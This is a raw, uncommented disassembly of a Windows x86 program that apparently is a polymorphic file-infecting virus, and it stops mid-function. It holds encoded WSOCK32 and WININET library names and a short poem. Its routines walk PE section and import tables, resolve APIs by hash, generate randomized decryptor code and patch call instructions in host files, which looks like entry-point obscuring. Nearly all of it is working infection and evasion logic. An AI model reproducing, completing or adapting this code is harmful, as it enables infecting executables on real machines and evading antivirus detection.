dd 8D8D310Fh, 4018E0h, 36468589h, 0FF510040h, 40359C95h
dd 4689300h, 8D000000h, 4018EDB5h, 0BD8D5900h, 40362Ch
dd 0FFF6D6E8h, 85C766FFh, 401D67h, 0A583F0FFh, 401D69h
dd 27958D00h, 5000401Dh, 6A016A54h, 2685200h, 0FF800000h
dd 40363095h, 5AC08500h, 8D8D2275h, 401D5Ah, 8D066A52h
dd 401D67B5h, 50565400h, 0FF525150h, 40363495h, 95FF5800h
dd 40362Ch, 384D85C6h, 0E8000040h, 0Ch, 434F5357h, 2E32334Bh
dd 4C4C44h, 359C95FFh, 68930040h, 7, 1844B58Dh, 8D590040h
dd 4035FCBDh, 0F651E800h, 0CE8FFFFh, 57000000h, 4E494E49h
dd 442E5445h, 0FF004C4Ch, 40359C95h, 0FC08500h, 1E784h
dd 5689300h, 8D000000h, 401882B5h, 0BD8D5900h, 403618h
dd 0FFF61AE8h, 1CBD83FFh, 4036h, 1C2840Fh, 0EC810000h
dd 190h, 1016854h, 95FF0000h, 4035FCh, 190C481h, 8B500000h
dd 52006AD4h, 361C95FFh, 0C0850040h, 680D7559h, 1388h
dd 35BC95FFh, 0E2EB0040h, 1D69BD83h, 75000040h, 6D858D29h
dd 5000401Dh, 360895FFh, 0C0850040h, 13B840Fh, 408B0000h
dd 0FF008B0Ch, 69858F30h, 0C600401Dh, 40384D85h, 6A0100h
dd 26A016Ah, 361495FFh, 0F8830040h, 12840FFFh, 93000001h
dd 1D65958Dh, 106A0040h, 95FF5352h, 403604h, 850FC085h
dd 0F2h, 1D86BD8Dh, 8B10040h, 0FFFABCE8h, 9468FFh, 2B5E0000h
dd 243489E6h, 9895FF54h, 8D004035h, 401D94BDh, 0E801B100h
dd 0FFFFFA9Dh, 1024448Bh, 0B08E0C1h, 0C1042444h, 440B08E0h
dd 0E8500824h, 5, 78362E25h, 95FF5700h, 403554h, 0C60CC483h
dd 8D200647h, 401D8195h, 68006A00h, 21h, 95FF5352h, 403610h
dd 14247C8Dh, 5895FF57h, 0C6004035h, 400A3804h, 5750006Ah
dd 1095FF53h, 3004036h, 0A2BD8DE6h, 6A00401Dh, 0C6800h
dd 53570000h, 361095FFh, 0C3D0040h, 75000000h, 4EB58D4Dh
dd 8D004036h, 40384D8Dh, 6ACE2B00h, 53565100h, 360C95FFh
dd 0F8830040h, 912F7E00h, 0B58DFE8Bh, 40364Eh, 0AEF20DB0h
dd 0E8601075h, 0FFFFFAF8h, 0E3177261h, 1778D09h, 0CF8BEAEBh
dd 0BD8DCE2Bh, 40364Eh, 0F787A4F3h, 0FF53B9EBh, 40360095h
dd 77BD8000h, 1004015h, 30682A74h, 0FF000075h, 4035BC95h
dd 4DBD8000h, 4038h, 85C71174h, 401D69h, 0
dd 384D85C6h, 0E9000040h, 0FFFFFE56h, 158085C7h, 40h, 0C25D8000h
dd 0A0D0004h, 6F6E204Fh, 6F206E6Fh, 696C2066h, 20216566h
dd 6974204Fh, 7420656Dh, 6563206Fh, 7262656Ch, 21657461h
dd 20200A0Dh, 4F202020h, 6D757320h, 2072656Dh, 64726167h
dd 0D216E65h, 6C65520Ah, 6C746E65h, 6C737365h, 61682079h
dd 20797070h, 20646E61h, 65707865h, 6E617463h, 73202C74h
dd 646E6174h, 3A676E69h, 0A0D2D20h, 63746157h, 676E6968h
dd 6C6C6120h, 79616420h, 646E6120h, 67696E20h, 202C7468h
dd 20726F66h, 65697266h, 2073646Eh, 61772049h, 0D3A7469h
dd 6568570Ah, 61206572h, 79206572h, 202C756Fh, 65697266h
dd 3F73646Eh, 6D6F4320h, 49202165h, 73692074h, 6D697420h
dd 49202165h, 20732774h, 6574616Ch, 0ED0A0D21h, 574FD479h
dd 43AAB59h, 2930C784h, 0D410A614h, 48714BC3h, 5C403752h
dd 0E8C26CCCh, 478352B2h, 6A6299ADh, 13606EF9h, 0E510A614h
dd 7E27B1FAh, 0DE1A73C1h, 520B3781h, 0D8B8B3h, 0Fh dup(0)
dd 67000000h
; ---------------------------------------------------------------------------
sbb cl, [eax+esi*2]
; =============== S U B R O U T I N E =======================================
sub_30908523 proc near ; CODE XREF: sub_3090856A:loc_309085C7�p
; sub_3090862A+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+4039A6h], 0
and dword ptr [ebp+4039AAh], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_3090853F: ; CODE XREF: sub_30908523+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_30908561
cmp eax, [edx+8]
jnb short loc_30908561
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+4039A6h], edx
mov [ebp+4039AAh], eax
jmp short loc_30908566
; ---------------------------------------------------------------------------
loc_30908561: ; CODE XREF: sub_30908523+23�j
; sub_30908523+28�j
add edx, 28h
loop loc_3090853F
loc_30908566: ; CODE XREF: sub_30908523+3C�j
popa
retn 4
sub_30908523 endp
; =============== S U B R O U T I N E =======================================
sub_3090856A proc near ; CODE XREF: UPX2:30908896�p
; UPX2:309088BC�p
mov [ebp+4022F7h], al
call sub_309085D9
push 20h
lea eax, [ebp+402224h]
pop ecx
loc_30908581: ; CODE XREF: sub_3090856A+1E�j
cmp [eax], ebx
jz short loc_30908591
add eax, 4
loop loc_30908581
inc dword ptr [ebp+40398Eh]
retn
; ---------------------------------------------------------------------------
loc_30908591: ; CODE XREF: sub_3090856A+19�j
neg ecx
add ecx, [ebp+4022F7h]
jecxz short loc_309085AB
loc_3090859B: ; CODE XREF: sub_3090856A+39�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_3090859B
mov [ebp+402224h], ebx
loc_309085AB: ; CODE XREF: sub_3090856A+2F�j
; sub_309085D9+34�j
cmp dword ptr [edx], 0
jz short loc_309085B5
sub esi, [edx]
add esi, [edx+10h]
loc_309085B5: ; CODE XREF: sub_3090856A+44�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_309085C4
push dword ptr [edx]
jmp short loc_309085C7
; ---------------------------------------------------------------------------
loc_309085C4: ; CODE XREF: sub_3090856A+54�j
push dword ptr [edx+10h]
loc_309085C7: ; CODE XREF: sub_3090856A+58�j
call sub_30908523
sub ecx, esi
sub ecx, [ebp+4039AAh]
pop eax
add ecx, [ebx+34h]
retn
sub_3090856A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_309085D9 proc near ; CODE XREF: sub_3090856A+6�p
pop dword ptr [ebp+403992h]
mov dword ptr [ebp+40398Eh], 0
call sub_3090862A
mov eax, [ebp+40398Eh]
call sub_30907D6E
call sub_30908616
cmp dword ptr [ebp+40398Eh], 0
jnz short loc_3090860F
mov [ebp+4022A0h], ebx
jmp short loc_309085AB
; ---------------------------------------------------------------------------
loc_3090860F: ; CODE XREF: sub_309085D9+2C�j
dec dword ptr [ebp+40398Eh]
retn
sub_309085D9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_30908616 proc near ; CODE XREF: sub_309085D9+20�p
pop dword ptr [ebp+403992h]
mov [ebp+40398Eh], edx
call sub_3090862A
xor ecx, ecx
retn
sub_30908616 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3090862A proc near ; CODE XREF: sub_309085D9+10�p
; sub_30908616+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_30908523
add edx, [ebp+4039AAh]
add edx, esi
loc_3090863E: ; CODE XREF: sub_3090862A+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_3090874F
cmp dword ptr [edx+10h], 0
jz locret_3090874F
mov eax, [edx+0Ch]
push eax
call sub_30908523
add eax, [ebp+4039AAh]
add eax, esi
push eax
loc_30908664: ; CODE XREF: sub_3090862A+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_30908684
cmp cl, 2Eh
jz short loc_30908673
loc_30908670: ; CODE XREF: sub_3090862A+58�j
inc eax
jmp short loc_30908664
; ---------------------------------------------------------------------------
loc_30908673: ; CODE XREF: sub_3090862A+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_30908670
loc_30908684: ; CODE XREF: sub_3090862A+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_30908747
cmp word ptr [eax-2], 3233h
jnz loc_30908747
push esi
cmp dword ptr [edx], 0
jnz short loc_309086A7
mov ecx, [edx+10h]
jmp short loc_309086A9
; ---------------------------------------------------------------------------
loc_309086A7: ; CODE XREF: sub_3090862A+76�j
mov ecx, [edx]
loc_309086A9: ; CODE XREF: sub_3090862A+7B�j
add esi, ecx
push ecx
call sub_30908523
add esi, [ebp+4039AAh]
loc_309086B7: ; CODE XREF: sub_3090862A+90�j
; sub_3090862A+117�j
lodsd
test eax, eax
js short loc_309086B7
jz loc_30908746
push dword ptr [ebp+4039AAh]
push eax
call sub_30908523
add eax, [ebp+4039AAh]
pop dword ptr [ebp+4039AAh]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_309086E3: ; CODE XREF: sub_3090862A+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_309086FA
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_309086E3
; ---------------------------------------------------------------------------
loc_309086FA: ; CODE XREF: sub_3090862A+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_30908740
cmp ebx, 0DB6E45A8h
jz short loc_30908740
cmp ebx, 0FFA13B59h
jz short loc_30908740
cmp ebx, 0ACB522D6h
jz short loc_30908740
cmp ebx, 0F358E993h
jz short loc_30908740
cmp ebx, 0F358E97Dh
jz short loc_30908740
cmp ebx, 0E1253F46h
jz short loc_30908740
cmp ebx, 0E1253F30h
jz short loc_30908740
call dword ptr [ebp+403992h]
loc_30908740: ; CODE XREF: sub_3090862A+D6�j
; sub_3090862A+DE�j ...
pop ebx
jmp loc_309086B7
; ---------------------------------------------------------------------------
loc_30908746: ; CODE XREF: sub_3090862A+92�j
pop esi
loc_30908747: ; CODE XREF: sub_3090862A+60�j
; sub_3090862A+6C�j
add edx, 14h
jmp loc_3090863E
; ---------------------------------------------------------------------------
locret_3090874F: ; CODE XREF: sub_3090862A+18�j
; sub_3090862A+22�j
retn
sub_3090862A endp
; ---------------------------------------------------------------------------
db 0
; =============== S U B R O U T I N E =======================================
sub_30908751 proc near ; CODE XREF: UPX2:3090888F�p
; UPX2:309088B5�p
push 4
pop eax
call sub_30907D6E
mov [ebp+4024D1h], dl
mov ax, 1831h
add ah, dl
shl ah, 3
add ah, dl
stosw
push 6
pop eax
call sub_30907D6E
add edx, 8
xchg edx, ecx
loc_30908779: ; CODE XREF: sub_30908751:loc_309087B8�j
push 5
pop eax
call sub_30907D6E
cmp dl, 3
jnb short loc_30908791
mov al, 50h
add al, [ebp+4024D1h]
stosb
jmp short loc_309087B8
; ---------------------------------------------------------------------------
loc_30908791: ; CODE XREF: sub_30908751+33�j
push 68h
pop eax
stosb
cmp dl, 3
jnz short loc_309087B2
mov al, 11h
call sub_30907D6E
mov eax, 1
loc_309087A6: ; CODE XREF: sub_30908751+5D�j
test dl, dl
jz short loc_309087B7
shl eax, 1
dec dl
jmp short loc_309087A6
; ---------------------------------------------------------------------------
jmp short loc_309087B7
; ---------------------------------------------------------------------------
loc_309087B2: ; CODE XREF: sub_30908751+47�j
mov eax, 80000000h
loc_309087B7: ; CODE XREF: sub_30908751+57�j
; sub_30908751+5F�j
stosd
loc_309087B8: ; CODE XREF: sub_30908751+3E�j
loop loc_30908779
retn
sub_30908751 endp
; ---------------------------------------------------------------------------
loc_309087BB: ; CODE XREF: sub_30909215+112�p
lea edi, [ebp+40343Ch]
test dword ptr [ebp+403431h], 80000000h
jz short loc_309087D0
mov al, 60h
stosb
loc_309087D0: ; CODE XREF: UPX2:309087CB�j
test dword ptr [ebp+403431h], 1000003h
jz loc_309088D6
; ---------------------------------------------------------------------------
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0EE1A3394h
xchg eax, esi
cmp [eax+0], eax
mov al, 0E8h
stosb
stosd
test dword ptr [ebp+403431h], 1000000h
mov [ebp+40399Ah], edi
jz short loc_3090884E
test dword ptr [ebp+403431h], 2000000h
mov eax, 36FF6467h
jnz short loc_30908819
mov eax, 2E8B6467h
loc_30908819: ; CODE XREF: UPX2:30908812�j
stosd
mov ax, 0
stosw
jz short loc_30908825
mov al, 5Dh
stosb
loc_30908825: ; CODE XREF: UPX2:30908820�j
test dword ptr [ebp+403431h], 8000000h
mov eax, 86D8Dh
jnz short loc_3090884C
test dword ptr [ebp+403431h], 4000000h
mov eax, 8C583h
jz short loc_3090884C
mov eax, 0F8ED83h
loc_3090884C: ; CODE XREF: UPX2:30908834�j
; UPX2:30908845�j
stosd
dec edi
loc_3090884E: ; CODE XREF: UPX2:30908801�j
test dword ptr [ebp+403431h], 3
jz short loc_3090885E
mov al, 0E9h
stosb
stosd
loc_3090885E: ; CODE XREF: UPX2:30908858�j
mov eax, [ebp+403996h]
mov ecx, edi
sub ecx, eax
mov [eax-4], ecx
test dword ptr [ebp+403431h], 3
jz short loc_309088D6
mov eax, 36FF6467h
mov [ebp+40399Eh], edi
stosd
mov eax, 64670000h
stosd
mov eax, 2689h
stosd
call sub_30908751
mov al, 20h
call sub_3090856A
jecxz short loc_309088D6
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
mov edx, [ebp+403431h]
not edx
test edx, 3
jnz short loc_309088C9
call sub_30908751
mov al, 1Fh
call sub_3090856A
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
loc_309088C9: ; CODE XREF: UPX2:309088B3�j
mov ecx, edi
mov eax, [ebp+40399Eh]
sub ecx, eax
mov [eax-4], ecx
loc_309088D6: ; CODE XREF: UPX2:309087DA�j
; UPX2:30908875�j ...
test dword ptr [ebp+403431h], 4
jz short loc_309088F4
mov eax, 0C8FEC029h
stosd
mov eax, 474C008h
stosd
mov eax, 67EBF875h
stosd
loc_309088F4: ; CODE XREF: UPX2:309088E0�j
test dword ptr [ebp+403431h], 8
jnz short loc_3090894A
cmp byte ptr [ebp+40342Fh], 0
jz short loc_3090894A
mov eax, 0C9291829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosd
mov al, 0B1h
stosb
mov al, [ebp+40342Fh]
stosb
mov al, 40h
or al, [ebp+40342Bh]
stosb
mov ax, 0FDE2h
test dword ptr [ebp+403431h], 10h
jz short loc_30908948
mov al, 49h
stosb
mov ax, 0FC75h
loc_30908948: ; CODE XREF: UPX2:3090893F�j
stosw
loc_3090894A: ; CODE XREF: UPX2:309088FE�j
; UPX2:30908907�j
mov al, 0E8h
stosb
xor eax, eax
stosd
mov [ebp+403982h], edi
test dword ptr [ebp+403431h], 20h
jnz short loc_3090896B
mov al, 58h
or al, [ebp+403429h]
stosb
loc_3090896B: ; CODE XREF: UPX2:30908960�j
mov ax, 0C081h
test dword ptr [ebp+403431h], 40h
jz short loc_3090897E
add ah, 28h
loc_3090897E: ; CODE XREF: UPX2:30908979�j
or ah, [ebp+403429h]
stosw
mov [ebp+403986h], edi
stosd
test dword ptr [ebp+403431h], 40000000h
jnz short loc_309089A2
mov al, 50h
add al, [ebp+403429h]
stosb
loc_309089A2: ; CODE XREF: UPX2:30908997�j
test dword ptr [ebp+403431h], 80h
jnz short loc_309089B9
mov al, 0B8h
or al, [ebp+40342Ah]
stosb
jmp short loc_309089F6
; ---------------------------------------------------------------------------
loc_309089B9: ; CODE XREF: UPX2:309089AC�j
mov ax, 1831h
test dword ptr [ebp+403431h], 100h
jz short loc_309089CB
mov al, 29h
loc_309089CB: ; CODE XREF: UPX2:309089C7�j
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
mov ax, 0F081h
test dword ptr [ebp+403431h], 200h
jnz short loc_309089EE
mov ah, 0C8h
loc_309089EE: ; CODE XREF: UPX2:309089EA�j
or ah, [ebp+40342Ah]
stosw
loc_309089F6: ; CODE XREF: UPX2:309089B7�j
mov [ebp+4039A2h], edi
mov eax, 243Ch
stosd
test dword ptr [ebp+403431h], 8
jz short loc_30908A7A
test dword ptr [ebp+403431h], 400h
jnz short loc_30908A25
mov al, 0B8h
or al, [ebp+40342Bh]
stosb
jmp short loc_30908A72
; ---------------------------------------------------------------------------
loc_30908A25: ; CODE XREF: UPX2:30908A18�j
test dword ptr [ebp+403431h], 800h
jnz short loc_30908A42
mov ax, 0E083h
or ah, [ebp+40342Bh]
stosw
xor eax, eax
stosb
jmp short loc_30908A57
; ---------------------------------------------------------------------------
loc_30908A42: ; CODE XREF: UPX2:30908A2F�j
mov ax, 1829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosw
loc_30908A57: ; CODE XREF: UPX2:30908A40�j
test dword ptr [ebp+403431h], 1000h
mov ax, 0C081h
jz short loc_30908A6A
add ah, 8
loc_30908A6A: ; CODE XREF: UPX2:30908A65�j
or ah, [ebp+40342Bh]
stosw
loc_30908A72: ; CODE XREF: UPX2:30908A23�j
movzx eax, byte ptr [ebp+40342Fh]
stosd
loc_30908A7A: ; CODE XREF: UPX2:30908A0C�j
test dword ptr [ebp+403431h], 40000000h
jz short loc_30908A8F
mov al, 50h
add al, [ebp+403429h]
stosb
loc_30908A8F: ; CODE XREF: UPX2:30908A84�j
test dword ptr [ebp+403431h], 2000h
mov al, 86h
jnz short loc_30908A9F
add al, 4
loc_30908A9F: ; CODE XREF: UPX2:30908A9B�j
lea ecx, [edi-2]
mov ah, [ebp+403429h]
mov [ebp+40398Ah], ecx
stosw
cmp ah, 5
jnz short loc_30908ABC
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_30908ABC: ; CODE XREF: UPX2:30908AB3�j
test dword ptr [ebp+403431h], 4000h
mov ax, 3166h
jnz short loc_30908ACE
mov ah, 29h
loc_30908ACE: ; CODE XREF: UPX2:30908ACA�j
stosw
mov al, 18h
or al, [ebp+40342Bh]
shl al, 3
stosb
mov al, 88h
test dword ptr [ebp+403431h], 8000h
jnz short loc_30908AEC
mov al, 86h
loc_30908AEC: ; CODE XREF: UPX2:30908AE8�j
mov ah, [ebp+403429h]
stosw
cmp ah, 5
jnz short loc_30908B00
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_30908B00: ; CODE XREF: UPX2:30908AF7�j
test dword ptr [ebp+403431h], 10000h
jnz short loc_30908B17
mov al, 40h
or al, [ebp+403429h]
stosb
jmp short loc_30908B26
; ---------------------------------------------------------------------------
loc_30908B17: ; CODE XREF: UPX2:30908B0A�j
mov ax, 0C083h
or ah, [ebp+403429h]
stosw
mov al, 1
stosb
loc_30908B26: ; CODE XREF: UPX2:30908B15�j
test dword ptr [ebp+403431h], 20000h
jnz short loc_30908B61
test dword ptr [ebp+403431h], 40000h
jnz short loc_30908B58
mov al, 0C0h
or al, [ebp+40342Bh]
mov ah, [ebp+403430h]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_30908B60
; ---------------------------------------------------------------------------
loc_30908B58: ; CODE XREF: UPX2:30908B3C�j
mov al, 40h
or al, [ebp+40342Bh]
loc_30908B60: ; CODE XREF: UPX2:30908B56�j
stosb
loc_30908B61: ; CODE XREF: UPX2:30908B30�j
test dword ptr [ebp+403431h], 80000h
jnz short loc_30908B7D
mov ax, 0E883h
or ah, [ebp+40342Ah]
stosw
mov al, 1
jmp short loc_30908B85
; ---------------------------------------------------------------------------
loc_30908B7D: ; CODE XREF: UPX2:30908B6B�j
mov al, 48h
or al, [ebp+40342Ah]
loc_30908B85: ; CODE XREF: UPX2:30908B7B�j
stosb
test dword ptr [ebp+403431h], 100000h
mov cl, 75h
jnz short loc_30908BB9
mov ax, 0F883h
or ah, [ebp+40342Ah]
stosw
xor eax, eax
stosb
sub [ebp+40398Ah], edi
test dword ptr [ebp+403431h], 200000h
jnz short loc_30908BD4
mov cl, 77h
jmp short loc_30908BD4
; ---------------------------------------------------------------------------
loc_30908BB9: ; CODE XREF: UPX2:30908B92�j
mov ax, 1809h
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
sub [ebp+40398Ah], edi
loc_30908BD4: ; CODE XREF: UPX2:30908BB3�j
; UPX2:30908BB7�j
mov al, cl
mov ah, [ebp+40398Ah]
stosw
mov al, 58h
add al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 1000003h
jz loc_30908C7E
mov eax, 268B6467h
mov ecx, [ebp+403431h]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_30908C15
mov eax, 2E876467h
loc_30908C15: ; CODE XREF: UPX2:30908C0E�j
stosd
mov eax, 0
stosw
jnz short loc_30908C25
mov ax, 0E58Bh
stosw
loc_30908C25: ; CODE XREF: UPX2:30908C1D�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test dword ptr [ebp+403431h], 1000000h
jnz short loc_30908C7B
test dword ptr [ebp+403431h], 8000000h
jz short loc_30908C6D
mov ax, 6C8Dh
test dword ptr [ebp+403431h], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
jnz short loc_30908C68
mov ax, 424h
stosw
jmp short loc_30908C7B
; ---------------------------------------------------------------------------
loc_30908C68: ; CODE XREF: UPX2:30908C5E�j
mov al, 8
stosb
jmp short loc_30908C7B
; ---------------------------------------------------------------------------
loc_30908C6D: ; CODE XREF: UPX2:30908C45�j
mov ax, 5D58h
add al, [ebp+40342Bh]
stosw
jmp short loc_30908C7E
; ---------------------------------------------------------------------------
loc_30908C7B: ; CODE XREF: UPX2:30908C39�j
; UPX2:30908C66�j ...
mov al, 0C9h
stosb
loc_30908C7E: ; CODE XREF: UPX2:30908BF1�j
; UPX2:30908C79�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_30908CAA
mov al, 7
sub al, [ebp+403429h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+403429h]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_30908CAA: ; CODE XREF: UPX2:30908C88�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
stosw
test dword ptr [ebp+403431h], 20h
jz short loc_30908D15
test dword ptr [ebp+403431h], 20000000h
jz short loc_30908CDB
loc_30908CCE: ; CODE XREF: UPX2:30908CD9�j
test edi, 3
jz short loc_30908CDB
mov al, 90h
stosb
jmp short loc_30908CCE
; ---------------------------------------------------------------------------
loc_30908CDB: ; CODE XREF: UPX2:30908CCC�j
; UPX2:30908CD4�j
mov eax, edi
mov ecx, [ebp+403982h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 400000h
jz short loc_30908D09
mov ax, 0C350h
or al, [ebp+403429h]
jmp short loc_30908D13
; ---------------------------------------------------------------------------
loc_30908D09: ; CODE XREF: UPX2:30908CFB�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
loc_30908D13: ; CODE XREF: UPX2:30908D07�j
stosw
loc_30908D15: ; CODE XREF: UPX2:30908CC0�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_30908D94
test dword ptr [ebp+403431h], 20000000h
jz short loc_30908D3A
loc_30908D2D: ; CODE XREF: UPX2:30908D38�j
test edi, 3
jz short loc_30908D3A
mov al, 90h
stosb
jmp short loc_30908D2D
; ---------------------------------------------------------------------------
loc_30908D3A: ; CODE XREF: UPX2:30908D2B�j
; UPX2:30908D33�j
mov ecx, edi
mov eax, [ebp+40399Ah]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+403431h], 800000h
jnz short loc_30908D63
lea eax, [ebp+403429h]
loc_30908D5B: ; CODE XREF: UPX2:30908D61�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_30908D5B
loc_30908D63: ; CODE XREF: UPX2:30908D53�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_30908D78
mov ax, 0C031h
stosw
loc_30908D78: ; CODE XREF: UPX2:30908D70�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_30908D91
mov ax, 0C031h
stosw
loc_30908D91: ; CODE XREF: UPX2:30908D89�j
mov al, 0C3h
stosb
loc_30908D94: ; CODE XREF: UPX2:30908D1F�j
lea eax, [ebp+40343Ch]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_30908DAC
push edi
sub edi, eax
pop eax
jmp short loc_30908DC5
; ---------------------------------------------------------------------------
loc_30908DAC: ; CODE XREF: UPX2:30908DA4�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+4039A2h]
add [ebp+403982h], edx
add [ecx], edi
mov eax, [esp+4]
loc_30908DC5: ; CODE XREF: UPX2:30908DAA�j
mov [ebp+40106Dh], edi
mov edi, [ebp+403986h]
sub eax, [ebp+403982h]
test dword ptr [ebp+403431h], 40h
jz short loc_30908DE5
neg eax
loc_30908DE5: ; CODE XREF: UPX2:30908DE1�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_30908DE9 proc near ; CODE XREF: sub_30909215+2A8�p
push esi
push edi
cmp dword ptr [ebp+4039AEh], 0
jz loc_30908FD1
call near ptr loc_30908E09+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_30908E09: ; CODE XREF: sub_30908DE9+F�p
add bh, bh
sub_30908DE9 endp ; sp-analysis failed
xchg eax, ebp
mov ds:85890040h, dh
mov esi, 53004039h
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_30908523
mov edx, [ebp+4039A6h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+4039C2h], eax
add eax, [edx+8]
mov [ebp+4039C6h], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_30908523
mov edi, [ebp+4039A6h]
push esi
call sub_30908523
mov edx, [ebp+4039A6h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_30908FD1
jz loc_30908FD1
add esi, [ebp+4039AAh]
add esi, [ebp+403972h]
; START OF FUNCTION CHUNK FOR sub_30908FA2
loc_30908E83: ; CODE XREF: sub_30908FA2+29�j
lodsb
cmp al, 0E8h
jnz loc_30908F2E
lea eax, [esi+4]
sub eax, [ebp+403972h]
add eax, [esi]
push eax
call sub_30908523
cmp dword ptr [ebp+4039A6h], 0
jnz short loc_30908EB1
cmp eax, [edi+0Ch]
jnb loc_30908FCA
jmp short loc_30908EBD
; ---------------------------------------------------------------------------
loc_30908EB1: ; CODE XREF: sub_30908FA2-FE�j
cmp [ebp+4039A6h], edx
jnz loc_30908FCA
loc_30908EBD: ; CODE XREF: sub_30908FA2-F3�j
add eax, [ebp+403972h]
cmp word ptr [eax], 25FFh
jnz loc_30908FCA
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_30908523
cmp [ebp+4039A6h], edi
jnz loc_30908FCA
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_30908FCA
cmp eax, [edi+8]
jnb loc_30908FCA
loc_30908F06: ; CODE XREF: sub_30908FA2+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+403972h]
push edx
push eax
push dword ptr [ebp+4039BEh]
call dword ptr [ebp+403548h]
pop edx
test eax, eax
jnz loc_30908FE0
jmp loc_30908FCA
; ---------------------------------------------------------------------------
loc_30908F2E: ; CODE XREF: sub_30908FA2-11C�j
cmp al, 0FFh
jnz loc_30908FCA
cmp byte ptr [esi], 15h
jnz loc_30908FCA
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_30908523
cmp [ebp+4039A6h], edi
jnz short loc_30908FCA
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov [ebp+4039CAh], eax
mov eax, [eax]
cmp eax, [ebp+4039C2h]
jb short loc_30908F77
cmp eax, [ebp+4039C6h]
jb short loc_30908FE0
loc_30908F77: ; CODE XREF: sub_30908FA2-35�j
cmp eax, 70000000h
jb short loc_30908FB5
call sub_30908FA2
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+4039CAh]
jnz short locret_30908FA1
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_30908FBC
; ---------------------------------------------------------------------------
locret_30908FA1: ; CODE XREF: sub_30908FA2-F�j
retn
; END OF FUNCTION CHUNK FOR sub_30908FA2
; =============== S U B R O U T I N E =======================================
sub_30908FA2 proc near ; CODE XREF: sub_30908FA2-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 30908E83 SIZE 0000011F BYTES
pop dword ptr [ebp+403992h]
pusha
mov esi, [ebp+403972h]
call sub_3090862A
popa
loc_30908FB5: ; CODE XREF: sub_30908FA2-26�j
test eax, 80000000h
jnz short loc_30908FCA
loc_30908FBC: ; CODE XREF: sub_30908FA2-3�j
sub eax, [edi+0Ch]
jb short loc_30908FCA
cmp eax, [edi+8]
jb loc_30908F06
loc_30908FCA: ; CODE XREF: sub_30908FA2-F9�j
; sub_30908FA2-EB�j ...
dec ecx
jnz loc_30908E83
loc_30908FD1: ; CODE XREF: sub_30908DE9+9�j
; UPX2:30908E6B�j ...
mov edi, [esp-4+arg_0]
